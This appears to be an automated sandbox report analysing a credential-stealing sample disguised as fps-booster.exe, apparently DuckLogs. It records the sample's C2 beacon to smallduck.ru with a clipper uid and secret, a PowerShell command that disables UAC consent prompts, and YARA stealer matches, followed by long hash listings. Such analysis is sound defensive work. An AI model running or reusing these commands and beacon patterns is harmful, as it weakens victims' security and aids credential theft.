            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x636BCD3E [Wed Nov 9 15:54:38 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
            Instruction
            jmp dword ptr [00402000h]
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfaa30 | 0x4b | .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfc000 | 0x652 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfe000 | 0xc | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x2000 | 0xf8a84 | 0xf8c00 | e98ecbb1b56e2241edcb185698c03685 | False | 0.9931935065954773 | data | 7.997901129081752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rsrc | 0xfc000 | 0x652 | 0x800 | e78b85beaf0eba70b7d2d40b53de0fb5 | False | 0.33544921875 | data | 3.533484897502172 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0xfe000 | 0xc | 0x200 | c30dc950ed0679bee25630c1dc2d190a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            RT_VERSION | 0xfc0a0 | 0x3c8 | data | | | 0.3956611570247934
            RT_MANIFEST | 0xfc468 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
            DLL | Import
            mscoree.dll | _CorExeMain
            Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
            2024-07-26T01:15:23.555322+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49722 | 40.127.169.103 | 192.168.2.6
            2024-07-26T01:14:31.085025+0200 | TCP | 2041654 | ET MALWARE Win32/DuckLogs Malware Activity (GET) | 49710 | 443 | 192.168.2.6 | 217.78.239.114
            2024-07-26T01:14:46.020724+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49718 | 40.68.123.157 | 192.168.2.6
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Jul 26, 2024 01:14:29.499272108 CEST | 59573 | 53 | 192.168.2.6 | 1.1.1.1
            Jul 26, 2024 01:14:29.852195978 CEST | 53 | 59573 | 1.1.1.1 | 192.168.2.6
            Jul 26, 2024 01:14:31.092550039 CEST | 62937 | 53 | 192.168.2.6 | 1.1.1.1
            Jul 26, 2024 01:14:31.100812912 CEST | 53 | 62937 | 1.1.1.1 | 192.168.2.6
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Jul 26, 2024 01:14:29.499272108 CEST | 192.168.2.6 | 1.1.1.1 | 0x144f | Standard query (0) | smallduck.ru | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 01:14:31.092550039 CEST | 192.168.2.6 | 1.1.1.1 | 0x47e1 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Jul 26, 2024 01:14:29.852195978 CEST | 1.1.1.1 | 192.168.2.6 | 0x144f | No error (0) | smallduck.ru | | 217.78.239.114 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 01:14:31.100812912 CEST | 1.1.1.1 | 192.168.2.6 | 0x47e1 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.6 | 49710 | 217.78.239.114 | 443 | 1488 | C:\Users\user\Desktop\fps-booster.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-25 23:14:30 UTC | 73 | OUT | GET /api.php?type=clipper&uid=1877&secret=wPYci5e0GiV2FngCxMdf HTTP/1.1
            2024-07-25 23:14:30 UTC | 77 | OUT | Data Ascii:
                Host: smallduck.ru
                Connection: keep-alive
                Accept-Encoding: gzip,deflate
            2024-07-25 23:14:31 UTC | 234 | IN | HTTP/1.1 301 Moved Permanently
                Server: nginx/1.18.0 (Ubuntu)
                Date: Thu, 25 Jul 2024 23:14:30 GMT
                Content-Type: text/html
                Content-Length: 178
                Connection: close
                Location: https://t.me/+KXQGBw_yd2o1ZmYy
                Content-Type: text/html
            2024-07-25 23:14:31 UTC | 178 | IN | Data Ascii:
                <html>
                <head><title>301 Moved Permanently</title></head>
                <body>
                <center><h1>301 Moved Permanently</h1></center>
                <hr><center>nginx/1.18.0 (Ubuntu)</center>
                </body>
                </html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.6 | 49711 | 149.154.167.99 | 443 | 1488 | C:\Users\user\Desktop\fps-booster.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-25 23:14:31 UTC | 33 | OUT | GET /+KXQGBw_yd2o1ZmYy HTTP/1.1
            2024-07-25 23:14:31 UTC | 69 | OUT | Data Ascii:
                Host: t.me
                Connection: keep-alive
                Accept-Encoding: gzip,deflate
            2024-07-25 23:14:32 UTC | 512 | IN | HTTP/1.1 200 OK
                Server: nginx/1.18.0
                Date: Thu, 25 Jul 2024 23:14:31 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 10801
                Connection: close
                Set-Cookie: stel_ssid=31eaee9b5c3920a1b3_16019558873433153298; expires=Fri, 26 Jul 2024 23:14:31 GMT; path=/; samesite=None; secure; HttpOnly
                Pragma: no-cache
                Cache-control: no-store
                X-Frame-Options: ALLOW-FROM https://web.telegram.org
                Content-Security-Policy: frame-ancestors https://web.telegram.org
                Strict-Transport-Security: max-age=35768000
            2024-07-25 23:14:32 UTC | 10801 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Join Group Chat</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


            Target ID:0
            Start time:19:14:26
            Start date:25/07/2024
            Path:C:\Users\user\Desktop\fps-booster.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\fps-booster.exe"
            Imagebase:0x870000
            File size:1'021'952 bytes
            MD5 hash:913B3CAEAB0B292DA088EA75C53AC17E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:19:14:27
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
            Imagebase:0x1b0000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:19:14:27
            Start date:25/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:19:14:31
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\WerFault.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724
            Imagebase:0x9e0000
            File size:483'680 bytes
            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true


              Execution Graph

              Execution Coverage:7.4%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:3
              Total number of Limit Nodes:0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: VC5?$rXlS
              • API String ID: 0-3822480623
              • Opcode ID: 0bd24c438af224356a1b939f25a6199a6ca34af03c050ff8d9a96401c4bf598d
              • Instruction ID: 6bb76b63f2627deccb7d278d52d8b2fa792301f7e468fbcef994336facfdc076
              • Opcode Fuzzy Hash: 0bd24c438af224356a1b939f25a6199a6ca34af03c050ff8d9a96401c4bf598d
              • Instruction Fuzzy Hash: F3A22574E2022ACFDB64DF64D99879EBBB6FB88601F0045A9D44AE7340DB359E81CF41
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: rXlS
              • API String ID: 0-3120032998
              • Opcode ID: 1db02ab1903c4381fe6b0bebdce415e5e27c5d9d33f0951b32d5818def3d593e
              • Instruction ID: 7d9163d9bba20518bd11fe6062d37472d35f44da4f63d07520e0fff85986d6c9
              • Opcode Fuzzy Hash: 1db02ab1903c4381fe6b0bebdce415e5e27c5d9d33f0951b32d5818def3d593e
              • Instruction Fuzzy Hash: 19223A74E21229CFDB249F74D95866DBBB6FF88601F0045A9D84AE7284DF368E90CF41
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 731c202940d8638cc2098494e0fe073d08d9f9d1e64d17edf30fcefdf492b40d
              • Instruction ID: c6c053dc35f0acc6408953c2070df63a12a1e014666b3d26d1ab8e8c8337da6c
              • Opcode Fuzzy Hash: 731c202940d8638cc2098494e0fe073d08d9f9d1e64d17edf30fcefdf492b40d
              • Instruction Fuzzy Hash: 7162E0347246028FDB14EB68D4D4B6EBBB2FF98700F10856AE612CB795DBB4E841CB51

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1dc9c870da3ced27bbf72679d181d0d4e7ea69bb4c7defb9a31e1bf4531d8a7a
              • Instruction ID: b72fa23f33bfa49c456e554ed9952e41dc936a00cc7bd9a129ceeee1337fd912
              • Opcode Fuzzy Hash: 1dc9c870da3ced27bbf72679d181d0d4e7ea69bb4c7defb9a31e1bf4531d8a7a
              • Instruction Fuzzy Hash: 06425875F001189FDB18CFA9D880AAEBBB2BF88304F158165F459AB366D731ED45CB90

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48416731e73f44848f993cb4cb0d856b11411935afea36a7f675db6a57b1f780
              • Instruction ID: a6c4adb0bad6e4a216f6537ab8ec680fdd379485138ae1e35d939d22744f58cf
              • Opcode Fuzzy Hash: 48416731e73f44848f993cb4cb0d856b11411935afea36a7f675db6a57b1f780
              • Instruction Fuzzy Hash: ED427D71A00605CFCB15CF68C9849AEBBF2FF88314B298968D4869B755D735F842CF98
              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9a6769dd8092c8fd443219e8af594efcc74f9a4ce5ad169a569be61eba3a0e7
              • Instruction ID: 3e760736a51a6fe44998e13a774340672d1b981c2c9ec17d95571583c2c4ee37
              • Opcode Fuzzy Hash: e9a6769dd8092c8fd443219e8af594efcc74f9a4ce5ad169a569be61eba3a0e7
              • Instruction Fuzzy Hash: 2051F772B041098FD744DBADC944A7FBABBFBC8614F518066E10AEB758CA71CD028B55

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: WMa
              • API String ID: 0-1036933573
              • Opcode ID: d72339754f9156d3de0959d1fe20964fb589fd5c340a6dcd39894ceb284ec0c5
              • Instruction ID: c63a735f02d85ed7da62910d01febed9196ada19c19920dde79405b90580b49a
              • Opcode Fuzzy Hash: d72339754f9156d3de0959d1fe20964fb589fd5c340a6dcd39894ceb284ec0c5
              • Instruction Fuzzy Hash: 6802A620B193868FD7169778C9A8B667BB25F82344F5984F7C544CF2D6DA24CC0AC752

              Control-flow Graph

              APIs
              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0133D173
              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID: ProtectVirtual
              • String ID:
              • API String ID: 544645111-0
              • Opcode ID: 8cbd0410719037e6c0bcd9122655fab8c11361f1382aa1e49dc440a64a30d52a
              • Instruction ID: 8583998b2542169a3fcb92f2064b040a716c263cf51343494421ad817e659171
              • Opcode Fuzzy Hash: 8cbd0410719037e6c0bcd9122655fab8c11361f1382aa1e49dc440a64a30d52a
              • Instruction Fuzzy Hash: F421D3B5D006499FDB10CF9AC884BDEFBF4EB48320F108429E958A7250D378A544CFA5

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 59cb4e825c645c7433b70d3e1f566fcf73cb25fd7c8befecb57a3c487eaa1cf9
              • Instruction ID: ac0abc854371972e23f0a262891693ee7b7c80d28341fbf582ecc2f4f441d931
              • Opcode Fuzzy Hash: 59cb4e825c645c7433b70d3e1f566fcf73cb25fd7c8befecb57a3c487eaa1cf9
              • Instruction Fuzzy Hash: CAF1EF30A11247CFDB18DF64C490B6AFBF2AF85304F54856DCA06AB386DB75E846CB91

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a1f6fd4c149fc0e7bc68f262b26d0c4357f5f253eaaabe3fdebd254bb400b73a
              • Instruction ID: 4c517da1b142e2a21433b40d9514e99781f3a4c9a825200818c5e20c596c55ef
              • Opcode Fuzzy Hash: a1f6fd4c149fc0e7bc68f262b26d0c4357f5f253eaaabe3fdebd254bb400b73a
              • Instruction Fuzzy Hash: 80E18E75A102068FCB05DF68C584AAEBBF2FF49300F1582A9E915AB365EB70ED45CB50

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cbcddfd401208913081b906d3b315db93b2042364115b3113d496f76a09d347c
              • Instruction ID: 5bfb56cfb539f7fb9fd728cdc4746257b5c34a215825386f08ca4b674087ff55
              • Opcode Fuzzy Hash: cbcddfd401208913081b906d3b315db93b2042364115b3113d496f76a09d347c
              • Instruction Fuzzy Hash: 5BC16330A04219DFDB05EFA8D8A4AAEBFB2FF99300F104569E505AB395DF385D05CB61
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53f03f3c17f3a5daa7f9ad9c28afed86fac10ab5cfb5ddb5c62e63a39339c32b
              • Instruction ID: c5bee9cfd44e1c2bdefcb1439084c77f142208119bd2ed824cd4f4b3551b92b0
              • Opcode Fuzzy Hash: 53f03f3c17f3a5daa7f9ad9c28afed86fac10ab5cfb5ddb5c62e63a39339c32b
              • Instruction Fuzzy Hash: 9591C1307287128FD725AB68D5D4B2AFBB2EF54700F10856AD6538B785CBF4E842CB51

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31231cf09860021927c8ab52d90dedf5020fda55f2c112bcd94f2baafd20a04b
              • Instruction ID: f8a22bdd5453567c4300731f121bd03107e7873c6355c4de9ffabd972c552a98
              • Opcode Fuzzy Hash: 31231cf09860021927c8ab52d90dedf5020fda55f2c112bcd94f2baafd20a04b
              • Instruction Fuzzy Hash: CB714634B20207CFDB259A79C4E463AB6E6AFCBA50715447AF716CB3E8EE64CC018751

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 136ef6450ae146602493b89aadc789024d35eee5eaae1f2a281a894729e6f069
              • Instruction ID: dc83913a6150c05d766fdbdad0433ed54d94868f204f2323597123c1c2e0eac4
              • Opcode Fuzzy Hash: 136ef6450ae146602493b89aadc789024d35eee5eaae1f2a281a894729e6f069
              • Instruction Fuzzy Hash: A951A13150E3808FCB07DF68D8E09953FB1AF4760071959EBC485CF2B7D629A909CB62

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7b05ce7a0bf243ba2947ec6fe636c85ae188bc86382e6b76582df46cc1f58a3d
              • Instruction ID: 5adbede588deaca555782b97075b8442874231142c43c07f13c7ef7b8e93b6ab
              • Opcode Fuzzy Hash: 7b05ce7a0bf243ba2947ec6fe636c85ae188bc86382e6b76582df46cc1f58a3d
              • Instruction Fuzzy Hash: 63815D31B102159FDB14EF79D894BAEBBF6FF88A10F158069E915DB3A1DA709C01CB90

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18dcfbf487801a370b12d187151688c1d56892c8015d224e8f3bb46b00e0b6d4
              • Instruction ID: d02c0578c6bd744236b60a99f6e7366c0abccb3b2308a6367b6c42892706be79
              • Opcode Fuzzy Hash: 18dcfbf487801a370b12d187151688c1d56892c8015d224e8f3bb46b00e0b6d4
              • Instruction Fuzzy Hash: 28612631F052528FCB11DF68D48099EFBB1FF89210B1586AAD569DB682CB30ED06CB91

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf4c41be47f53f995691047aec0aa4dd5cd9ce10a437abbfcdc27cbd3a9edef2
              • Instruction ID: e9e3d466c5fdf46229bddd4fa87cb23bddf92553a88cfd595f10b4087fc2e510
              • Opcode Fuzzy Hash: cf4c41be47f53f995691047aec0aa4dd5cd9ce10a437abbfcdc27cbd3a9edef2
              • Instruction Fuzzy Hash: 3E61E134A1020B9FCB15DF68C494AAEBFF2FF99310F104569EA059B391DB349941CB90

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 040fb0e278dba9002a7c31cb8b7c8e5e05d9e45a6fef3eef7af3bad045344f46
              • Instruction ID: 250a9ec64634641df35edd246086d9586dca7e3c1fd6b5ccdd550efc6b3bdfca
              • Opcode Fuzzy Hash: 040fb0e278dba9002a7c31cb8b7c8e5e05d9e45a6fef3eef7af3bad045344f46
              • Instruction Fuzzy Hash: 3751C134A1020ADFCB05DF68C894AAEBFF2FF99310F1045ADEA069B361D7319941CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05e42a2d102acb18c5bd84592863be1e27cfcbced8a4bb8360d8239755c2aca5
              • Instruction ID: 086e144e2008824e221db9d9e1a4ccf1827c7798b334eb8c3cf8ed2a889315c0
              • Opcode Fuzzy Hash: 05e42a2d102acb18c5bd84592863be1e27cfcbced8a4bb8360d8239755c2aca5
              • Instruction Fuzzy Hash: 14510B74A00219DFDB05EBE4D864AEEBFB2FF99301F104419E5066B3A1DA392D45CF61
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f074beda530d5b188912dcb9ba48196b82262b02774a69fe8b87dce8898db920
              • Instruction ID: a7638084b3cfc62eecc2a0b7ac79c21494477251da20d1abdec5ff22c7ef3987
              • Opcode Fuzzy Hash: f074beda530d5b188912dcb9ba48196b82262b02774a69fe8b87dce8898db920
              • Instruction Fuzzy Hash: 2E41B131B1124A8FDB24DFB4E594AEEBBB2EF85315F100479E605A7395CB369C44CB60
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 314798167ff2b4111b71d688f6c27fab219b71342cc75832501a79182a708357
              • Instruction ID: 740329979f456ed9e1100db498226c503333dda731e293da359b1c8615cea997
              • Opcode Fuzzy Hash: 314798167ff2b4111b71d688f6c27fab219b71342cc75832501a79182a708357
              • Instruction Fuzzy Hash: 79416D75A10618DFCB05EFA8D8949EDBBB5FF49310F11426AF602EB360EB31A845CB50
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac6c6bf696c7540d39c1d143eaef326792a5098e85f87c7a0bd60bae0bcc47b1
              • Instruction ID: d45c4313ccfee4cfa0868112182fff0e5bfdb9a1f34240410f41f5f9b282baf9
              • Opcode Fuzzy Hash: ac6c6bf696c7540d39c1d143eaef326792a5098e85f87c7a0bd60bae0bcc47b1
              • Instruction Fuzzy Hash: 3A512634D12249DFCB05DFB4E29889DBBB6FF49301F5045A9E902A3780DB35A942CFA1
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f5ee5d256a26e66518a6febf4d59d614e8ca2bdbacabfb31ea17790101e8831
              • Instruction ID: db41339f5e52ad4db19191754da4760ffec6a72078277ef1ad40227edd61667f
              • Opcode Fuzzy Hash: 0f5ee5d256a26e66518a6febf4d59d614e8ca2bdbacabfb31ea17790101e8831
              • Instruction Fuzzy Hash: B7411934A1020ADFCB11DFA8D484AAEBBF5FF59314F104569EA059B761D734E981CF90
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 980fac3e3c95c948f7782aa8b0a756dcd4701d3b3360fe7209c74aa89615954c
              • Instruction ID: d5fcb28c1378cd2f011e7e3c561d756727f2850f1e17ff29a4d87211b335e261
              • Opcode Fuzzy Hash: 980fac3e3c95c948f7782aa8b0a756dcd4701d3b3360fe7209c74aa89615954c
              • Instruction Fuzzy Hash: 4651E834D12209DFCB05DFB4E24889DBBB6FF48311F6045A9E902A3750DB35A982CFA0
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fea7fb4eefa4de90090e57ee8b9b2fe9742aa19bc8085bdff5f565e53c9e3e2
              • Instruction ID: 7f9cb1c4ad94913ab1e08065b00b6e3e0ecfd1d82f31d679c561aedbf9332a15
